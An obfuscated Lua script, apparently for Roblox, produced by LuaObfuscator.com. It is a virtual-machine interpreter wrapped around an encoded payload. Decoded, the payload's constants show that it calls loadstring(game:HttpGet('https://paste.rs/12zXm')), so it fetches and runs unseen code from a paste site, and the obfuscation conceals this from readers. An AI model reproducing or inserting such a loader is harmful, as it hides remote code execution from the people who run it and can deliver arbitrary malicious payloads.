--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v123=v5(v88,v19);v19=nil;return v123;else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(88 + 467 + 64)))) ;return v89-(v89%((1809 -(282 + 595)) -(857 + (1711 -(1523 + 114))))) ;else local v90=(570 -(367 + 201))^(v32-1) ;return (((v31%(v90 + v90))>=v90) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(222 + 4 + 1044)) );v18=v18 + (17 -(3 + 10)) ;return (v40 * 16777216) + (v39 * 65536) + (v38 * (373 -((989 -(892 + 65)) + 85))) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(794 -(368 + 423))) then if (v46==(0 -0)) then if (v45==(18 -(10 + 8))) then return v47 * (0 -0) ;else local v124=442 -(416 + 26) ;while true do if (v124==(350 -(87 + 263))) then v46=181 -(67 + 113) ;v44=0 -0 ;break;end end end elseif (v46==((2925 -(630 + 793)) + (1846 -1301))) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(4065 -3042) ) * (v44 + (v45/((954 -(802 + 150))^(139 -87)))) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1 + 0 ;end if (v41==(999 -(915 + (388 -306)))) then v46=v20(v43,59 -38 ,19 + 12 );v47=((v20(v43,116 -84 )==((1 + 0) -0)) and  -(3 -2)) or (3 -2) ;v41=1190 -((2816 -(760 + 987)) + 118) ;end if (v41==(2 -1)) then v44=2 -1 ;v45=(v20(v43,1 -(1913 -(1789 + 124)) ,(770 -(745 + 21)) + 16 ) * ((887 -(261 + 624))^(56 -(9 + 15)))) + v42 ;v41=1082 -((2806 -1786) + 60) ;end end end local function v25(v48) local v49;if  not v48 then local v91=0 -0 ;while true do if (v91==(0 + (0 -0))) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(4 -3) );v18=v18 + v48 ;local v50={};for v66=(1414 -(447 + 966)) + 0 , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 0;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v92~= #"]") then else if (v93== #"~") then v94=(function() return v95()~=0 ;end)();elseif (v93==2) then v94=(function() return v96();end)();elseif (v93== #"asd") then v94=(function() return v97();end)();end v98[v99]=(function() return v94;end)();break;end if (0~=v92) then else local v115=(function() return 0;end)();local v116=(function() return;end)();while true do if ((1637 -(195 + 1442))~=v115) then else v116=(function() return 0;end)();while true do if (v116~=(0 -0)) then else v93=(function() return v95();end)();v94=(function() return nil;end)();v116=(function() return 1 + 0 ;end)();end if (v116~=(1 + 0)) then else v92=(function() return  #"{";end)();break;end end break;end end end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v52=(function() return function(v100,v101,v102) local v103=(function() return 0;end)();while true do if (v103~=0) then else local v117=(function() return 396 -(115 + 281) ;end)();while true do if (v117==(0 -0)) then v100[v101-#"/" ]=(function() return v102();end)();return v100,v101,v102;end end end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #" ",v57 do FlatIdent_7366E,Type,Cons,v21,v24,v25,v58,v68=(function() return v51(FlatIdent_7366E,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"xnx"]=(function() return v21();end)();for v69= #"[",v23() do local v70=(function() return v21();end)();if (v20(v70, #"[", #"{")==(0 -0)) then local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if ((868 -(550 + 317))~=v106) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(0 -0)) then local v126=(function() return 0 -0 ;end)();local v127=(function() return;end)();while true do if (v126==(285 -(134 + 151))) then v127=(function() return 1665 -(970 + 695) ;end)();while true do if (v127~=0) then else v109[ #"asd"]=(function() return v22();end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v107== #"}") then v109[ #"gha"]=(function() return v23();end)();elseif (v107==(3 -1)) then v109[ #"xxx"]=(function() return v23() -((1992 -(582 + 1408))^(55 -39)) ;end)();elseif (v107== #"xnx") then local v159=(function() return 0;end)();local v160=(function() return;end)();while true do if (0==v159) then v160=(function() return 0;end)();while true do if (v160~=0) then else v109[ #"gha"]=(function() return v23() -((2 -0)^(60 -44)) ;end)();v109[ #"http"]=(function() return v22();end)();break;end end break;end end end v106=(function() return 2;end)();end if (v106~=0) then else local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if (v120~=0) then else v121=(function() return 1824 -(1195 + 629) ;end)();while true do if (0==v121) then local v151=(function() return 0 -0 ;end)();while true do if ((241 -(187 + 54))==v151) then v107=(function() return v20(v70,2, #"nil");end)();v108=(function() return v20(v70, #"0313",786 -(162 + 618) );end)();v151=(function() return 1;end)();end if (v151~=(1 + 0)) then else v121=(function() return 1 + 0 ;end)();break;end end end if ((1 -0)==v121) then v106=(function() return 1;end)();break;end end break;end end end if (v106~=(2 -0)) then else if (v20(v108, #">", #":")== #".") then v109[1 + 1 ]=(function() return v58[v109[1638 -(1373 + 263) ]];end)();end if (v20(v108,2,1002 -(451 + 549) )~= #"!") then else v109[ #"nil"]=(function() return v58[v109[ #"91("]];end)();end v106=(function() return 3;end)();end if (v106~=(1 + 2)) then else if (v20(v108, #"gha", #"91(")== #"|") then v109[ #".com"]=(function() return v58[v109[ #"asd1"]];end)();end v53[v69]=(function() return v109;end)();break;end end end end for v71= #"<",v23() do v54,v71,v28=(function() return v52(v54,v71,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2 -0 ];local v65=v60[4 -1 ];return function(...) local v72=v63;local v73=v64;local v74=v65;local v75=v27;local v76=1;local v77= -(1385 -(746 + 638));local v78={};local v79={...};local v80=v12("#",...) -(1 -0) ;local v81={};local v82={};for v104=341 -(218 + 123) ,v80 do if (v104>=v74) then v78[v104-v74 ]=v79[v104 + (1582 -(1535 + 46)) ];else v82[v104]=v79[v104 + 1 ];end end local v83=(v80-v74) + (321 -(53 + 267)) + 0 ;local v84;local v85;while true do local v105=0 + 0 ;while true do if ((v105==0) or (2874<2181)) then v84=v72[v76];v85=v84[1 + 0 ];v105=(974 -(15 + 398)) -(306 + 254) ;end if (v105==(1 + 0)) then if (v85<=((987 -(18 + 964)) -2)) then if (v85<=((5525 -4057) -(899 + 329 + 239))) then if ((v85==0) or (2689<=343)) then local v132=v84[2 + 0 + 0 ];local v133,v134=v75(v82[v132](v13(v82,v132 + (2 -1) ,v84[853 -(20 + 830) ])));v77=(v134 + v132) -(604 -(268 + 335)) ;local v135=290 -(60 + 230) ;for v152=v132,v77 do v135=v135 + (573 -(426 + 146)) ;v82[v152]=v133[v135];end else v82[v84[1 + 1 ]]=v84[1459 -(221 + 61 + 1174) ];end elseif (v85==2) then local v138=811 -(569 + 242) ;local v139;local v140;while true do if ((v138==(0 -(126 -(116 + 10)))) or (1869==2009)) then v139=v84[1 + 1 ];v140=v82[v84[1027 -(706 + 318) ]];v138=(93 + 1159) -(721 + (1268 -(542 + 196))) ;end if (v138==(1272 -(945 + 326))) then v82[v139 + (2 -(1 -0)) ]=v140;v82[v139]=v140[v84[4 + 0 ]];break;end end else local v141=700 -(80 + 191 + 429) ;local v142;local v143;local v144;local v145;local v146;while true do if (v141==2) then v84=v72[v76];v146=v84[2];v145=v82[v84[2 + 1 ]];v82[v146 + 1 + 0 ]=v145;v82[v146]=v145[v84[1504 -(1408 + 92) ]];v76=v76 + (1087 -(461 + 225 + 400)) ;v141=1291 -(993 + 295) ;end if (v141==(1 + 3)) then v77=(v144 + v146) -1 ;v142=1171 -(418 + 753) ;for v188=v146,v77 do local v189=(0 -0) + 0 ;while true do if (v189==(0 + (0 -0))) then v142=v142 + 1 ;v82[v188]=v143[v142];break;end end end v76=v76 + 1 + (1551 -(1126 + 425)) ;v84=v72[v76];v146=v84[1 + 1 ];v141=534 -((811 -(118 + 287)) + 123) ;end if ((v141==(1772 -(1749 + 20))) or (3546<2322)) then v84=v72[v76];v82[v84[1 + 1 ]]=v84[1325 -(1249 + (285 -212)) ];v76=v76 + 1 + 0 ;v84=v72[v76];v146=v84[2];v143,v144=v75(v82[v146](v13(v82,v146 + 1 ,v84[3])));v141=1149 -(466 + 679) ;end if ((v141==6) or (2082==4773)) then do return;end break;end if (v141==(11 -6)) then v82[v146]=v82[v146](v13(v82,v146 + (2 -1) ,v77));v76=v76 + (1901 -((1227 -(118 + 1003)) + 1794)) ;v84=v72[v76];v82[v84[1 + 1 ]]();v76=v76 + 1 + 0 ;v84=v72[v76];v141=17 -11 ;end if (v141==((0 -0) -0)) then v142=nil;v143,v144=nil;v145=nil;v146=nil;v82[v84[2]]={};v76=v76 + 1 ;v141=115 -(4 + 110) ;end if (v141==(585 -(57 + 527))) then v84=v72[v76];v82[v84[1429 -(41 + 1386) ]]=v62[v84[106 -((394 -(142 + 235)) + 86) ]];v76=v76 + (4 -3) + 0 ;v84=v72[v76];v82[v84[2]]=v62[v84[6 -3 ]];v76=v76 + (2 -(1 + 0)) ;v141=168 -(122 + 44) ;end end end elseif (v85<=(8 -3)) then if ((3244>1055) and (v85==(12 -8))) then local v147=0 + 0 ;local v148;while true do if (v147==(0 + 0)) then v148=v84[(980 -(553 + 424)) -1 ];v82[v148]=v82[v148](v13(v82,v148 + (66 -(30 + 35)) ,v77));break;end end else v82[v84[2]]={};end elseif (v85<=6) then v82[v84[2 + 0 ]]();elseif ((v85==(1264 -(1043 + 214))) or (3313<=1778)) then v82[v84[7 -5 ]]=v62[v84[1215 -(323 + (1680 -791)) ]];else do return;end end v76=v76 + ((2 + 0) -1) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403163Q00682Q7470733A2Q2F70617374652E72732F31327A586D00094Q00037Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
